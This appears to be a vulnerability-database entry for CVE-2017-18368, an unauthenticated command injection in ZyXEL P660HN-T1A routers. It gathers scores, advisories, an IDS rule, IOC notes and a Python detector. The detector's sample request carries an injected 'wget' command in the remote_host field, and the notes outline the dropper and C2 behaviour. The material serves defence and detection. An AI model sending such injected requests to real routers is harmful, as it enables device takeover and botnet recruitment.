CVE-2017-18368
Published 2019-05-02
Priority P195 · critical 9.8 (CVSS 3.1) · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CISA Known Exploited Vulnerability (remediation due 2023-08-28) · Exploited in the wild · Initial access
EPSS: 94.51% (99.8th percentile)
The ZyXEL P660HN-T1A v1 TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31 router distributed by TrueOnline has a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user. The vulnerability is in the ViewLog.asp page and can be exploited through the remote_host parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| billion | 5200w-t_firmware | — | — |
| zyxel | p660hn-t1a_v1_firmware | — | — |
| zyxel | p660hn-t1a_v2_firmware | — | — |
Detection & IOCs (extracted from sources)
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE (CVE-2017-18368)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/ViewLog.asp"; startswith; endswith; http.request_body; content:"remote_submit_Flag="; startswith; content:"&remote_host="; distance:0; content:"&remoteSubmit=Save|0d 0a 0d 0a|"; endswith; fast_pattern; reference:url,seclists.org/fulldisclosure/2017/Jan/40; reference:cve,2017-18368; reference:url,github.com/pedrib/PoC/blob/master/advisories/zyxel_trueonline.txt; classtype:attempted-user; sid:2027092; rev:6; metadata:attack_target IoT, created_at 2019_03_18, cve CVE_2017_18368, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_04_13;)
- Exploit targets POST /cgi-bin/ViewLog.asp with injection via the remote_host parameter; look for semicolons and shell commands (wget, chmod) in the remote_host field of HTTP POST bodies to this endpoint.
- The exploit HTTP request uses the distinctive User-Agent string 'Ankit'; alert on POST requests to /cgi-bin/ViewLog.asp with this User-Agent.
- The POST body always begins with 'remote_submit_Flag=' and contains '&remote_host=' followed by injected shell commands; use these as body content anchors for detection (ET SID 2027092).
- Malware dropper payload drops an ARM7 binary to /tmp and executes it with the argument 'zyxel'; monitor for process execution of files dropped to /tmp on embedded Linux devices.
- C2 communication occurs over TCP port 993 (typically associated with IMAPS) to the dropper server; monitor for outbound TCP/993 connections from IoT/router devices to unexpected IPs.
- The exploit is accessible without authentication; any unauthenticated POST to /cgi-bin/ViewLog.asp should be treated as suspicious on ZyXEL P660HN-T1A devices.
- The vulnerability specifically affects the TrueOnline-distributed ZyXEL P660HN-T1A v1 firmware (TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31); other P660HN-T v1 variants in other countries may also be vulnerable but were not confirmed in a live environment.
- The Metasploit module was tested only in an emulated environment, not on a live physical device; real-world behavior may differ.
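The anchors the rule and the notes above describe, turned into a small request inspector, as an added example in Python (not code from the page, from Emerging Threats or from ZyXEL): it parses a raw HTTP request, requires the same method/path/body anchors as ET SID 2027092, then URL-decodes the remote_host value and checks it for shell metacharacters and the dropper commands named in the IOC notes, and checks the User-Agent for 'Ankit'. The three sample requests are constructed for the example, not captured traffic; the metacharacter and command regexes and the severity labels are this example's own choices, not anything the page specifies.

```python
"""Detect CVE-2017-18368 exploitation attempts in raw HTTP request text.

Mirrors the body anchors of ET SID 2027092 (POST /cgi-bin/ViewLog.asp, body
starting with 'remote_submit_Flag=' and carrying '&remote_host=') and then
inspects the decoded remote_host value, which should only ever hold a syslog
destination host or IP. Example code, not the page's or any vendor's.
"""
import re
from urllib.parse import unquote_plus

TARGET_PATH = "/cgi-bin/ViewLog.asp"
# Shell metacharacters that never belong in a syslog destination host field.
# Assumption of this example: the character set is our own, not from the rule.
SHELL_META = re.compile(r"[;|&`$\n\r]")
# Dropper tooling named in the IOC notes for this exploit.
DROPPER_CMDS = re.compile(r"\b(wget|chmod|curl|tftp)\b")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    method = parts[0]
    path = parts[1].split("?", 1)[0] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_form(body):
    """Decode a form-urlencoded body; the first value wins for duplicate keys."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(key), unquote_plus(value))
    return fields


def analyse(raw):
    """Return a list of (severity, reason) findings for one request."""
    method, path, headers, body = parse_request(raw)
    findings = []
    if method != "POST" or path != TARGET_PATH:
        return findings
    # The endpoint is reachable without authentication, so any POST is notable.
    findings.append(("low", "POST to ViewLog.asp from an unauthenticated client"))
    if headers.get("user-agent", "") == "Ankit":
        findings.append(("medium", "User-Agent 'Ankit' matches known exploit tooling"))
    # Same body anchors the Suricata rule keys on.
    if not body.startswith("remote_submit_Flag=") or "&remote_host=" not in body:
        return findings
    host = parse_form(body).get("remote_host", "")
    if SHELL_META.search(host):
        findings.append(("high", "shell metacharacter in remote_host: %r" % host))
    if DROPPER_CMDS.search(host):
        findings.append(("high", "dropper command in remote_host: %r" % host))
    return findings


# Constructed sample requests (not captured traffic). The injected string in
# MALICIOUS is a generic illustration of the pattern the IOC notes describe.
MALICIOUS = (
    "POST /cgi-bin/ViewLog.asp HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "User-Agent: Ankit\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "remote_submit_Flag=1"
    "&remote_host=192.0.2.9%3Bwget+http%3A%2F%2F192.0.2.9%2Fx"
    "&remoteSubmit=Save\r\n\r\n"
)
BENIGN = (
    "POST /cgi-bin/ViewLog.asp HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
    "remote_submit_Flag=1&remote_host=192.0.2.50&remoteSubmit=Save\r\n\r\n"
)
UNRELATED = "GET /index.html HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS), ("benign", BENIGN), ("unrelated", UNRELATED)):
        print(label, analyse(sample))
```

A legitimate syslog-forwarding save produces only the low-severity endpoint note, so the high-severity findings are what a SOC would page on; the Suricata rule additionally requires the body to end with `&remoteSubmit=Save` followed by a blank line, which this inspector deliberately does not require so that a trimmed or reordered body still gets looked at.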
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| VulnCheck | — | 9.8 | CRITICAL | — |
| CISA | — | 9.8 | CRITICAL | — |
GHSA
GHSA-8hjr-66w2-mg84 · ghsa_unreviewed · 2022-05-24 · CVE-2017-18368 [CRITICAL] · CWE-78
The ZyXEL P660HN-T1A v1 TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31 router distributed by TrueOnline has a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user. The vulnerability is in the ViewLog.asp page and can be exploited through the remote_host parameter.
VulnCheck
Zyxel P660HN-T1A Routers Command Injection Vulnerability
vulncheck · 2017 · CVSS 9.8 · CVE-2017-18368 [CRITICAL] · CWE-78
Zyxel P660HN-T1A routers contain a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user and exploited via the remote_host parameter of the ViewLog.asp page.
Affected: Zyxel P660HN-T1A Routers
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References:
- https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits
- https://cujo.com/blog/iot-botnet-report-2021-malware-and-vulnerabilities-targeted/
- https://blog.apnic.net/2021/12/23/preparing-for-the-next-large-scale-
CISA
Zyxel P660HN-T1A Routers Command Injection Vulnerability
cisa · 2023-08-07 · CVSS 9.8 · CVE-2017-18368 [CRITICAL] · CWE-78
Vulnerability: Zyxel P660HN-T1A Routers Command Injection Vulnerability
Affected: Zyxel P660HN-T1A Routers
Zyxel P660HN-T1A routers contain a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user and exploited via the remote_host parameter of the ViewLog.asp page.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes:
- https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-a-new-variant-of-gafgyt-malware
- https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-vulnerability-in-p660hn-t1a-dsl-cpe
- https://nvd.nist.gov/vuln/detail/CVE-2017-18368
Remediation Due: 2023-08-28
Suricata
ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE (CVE-2017-18368)
suricata · 2019-03-18 · CVSS 9.8 · CVE-2017-18368 [CRITICAL]
Rule: ET SID 2027092, rev 6; the full rule text is given under Detection & IOCs above.
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro · 2025-10-09 · CVSS 8.8 [HIGH]
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus · Oct 09, 2025
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022.
Januar
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits (key takeaways excerpt)
blogs_trendmicro · 2025-10-09
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus · 2025/10/09
Key takeaways
- The campaign exposes organizations to the risks of data exfiltration, persistent network compromise, and operational disruption for organizations with exposed infrastructure.
- Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vul
Fortinet
2022 IoT Threat Review | FortiGuard Labs
blogs_fortinet · 2023-01-13 · CVSS 8.8 [HIGH]
FORTIGUARD LABS THREAT RESEARCH
By Eduardo Altares, Joie Salvio and Roy Tay | January 13, 2023
FortiGuard Labs monitors the IoT botnet threat landscape for new and emerging campaigns. We do this with the assistance of the honeypots we have deployed to capture active attacks in the wild. This article provides insights into the data collected from our monitoring system over the past year.
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
Attack Origins
Our distributed honeypot systems allow us to capture and monitor campaigns that are actively targeting IoT devices for infection. In most cases, these devices are turned into bots used to perform Distributed Denial o
Fortinet
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
blogs_fortinet · 2022-04-12
FORTIGUARD LABS THREAT RESEARCH
By Joie Salvio and Roy Tay | April 12, 2022
In mid-March, FortiGuard Labs observed a new DDoS botnet calling itself “Enemybot” and attributing itself to Keksec, a threat group that specializes in cryptomining and DDoS attacks.
This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
It uses several methods of obfuscation for its strings to hinder analysis and hide itself from other botnets. Furthermore, it connects to a command-and-control (C2) server that is hidden in the Tor network, making its takedown more complicated.
Enemybot has been seen targeting routers from Seowon Intech, D-Link, and exploits a recently reported
Unit42
Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
blogs_unit42 · 2019-10-31 · CVSS 9.8 [CRITICAL]
Asher Davila · Published: October 31, 2019
Tags: Cybercrime, Threat Research, Vulnerabilities, Botnet, DDoS, Exploit kit, IoT, WiFi routers
## Executive Summary
In September 2019, during the proactive IoT threat-hunting process conducted daily by the Unit 42 (formerly Zingbox security research) team, we discovered an updated Gafgyt variant attempting to infect IoT devices; specifically small office/home wireless routers of known commercial brands like Zyxel, Huawei, and Realtek. This Gafgyt variant is a competing botnet to the JenX botnet, which also uses remote code execution exploits to gain access and recruit routers into botnets to attack gaming servers - most notably those running the Valve Source engine - and cause a Denial of Service (DoS). This variant also competes against similar botnets, which we have found are frequently sold on Instagram. According to Shodan scans, there are more than 32,000 WiFi routers potentia
References
- http://www.zyxel.com/support/announcement_unauthenticated.shtml
- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt
- https://seclists.org/fulldisclosure/2017/Jan/40
- https://ssd-disclosure.com/index.php/archives/2910
- https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-18368
Timeline
- 2019-05-02: Published
- 2023-08-07: Added to CISA KEV
- Exploited in the wild